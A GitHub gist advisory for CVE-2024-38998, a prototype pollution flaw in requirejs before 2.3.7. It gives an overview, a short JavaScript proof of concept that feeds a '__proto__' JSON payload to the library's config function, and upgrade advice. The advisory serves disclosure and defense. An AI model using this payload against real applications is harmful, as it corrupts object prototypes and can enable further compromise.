Skip to content

Instantly share code, notes, and snippets.

@tariqhawis

tariqhawis/CVE-2024-38998.md

Last active September 11, 2024 18:12
Show Gist options
  • Save tariqhawis/47e536069282320ad7817f45d64207b3 to your computer and use it in GitHub Desktop.
Save tariqhawis/47e536069282320ad7817f45d64207b3 to your computer and use it in GitHub Desktop.
Download ZIP
[CVE-2024-38998] A Prototype Pollution vulnerability Affecting requirejs package, versions < 2.3.7
Raw
CVE-2024-38998.md

Overview

Affected versions of this module are vulnerable to a Prototype Pollution vulnerability, due to missing check if the argument resolves to the object prototype. This allows the attacker to inject malicious object property using the built-in Object property __proto__ which is recursively assigned to all the objects in the program.

PoC

(async () => {
  const lib = await import('requirejs');
var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}')

var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
	lib.default.config (BAD_JSON)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

Mitigation

Upgrade the package to the latest version, 2.3.7

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment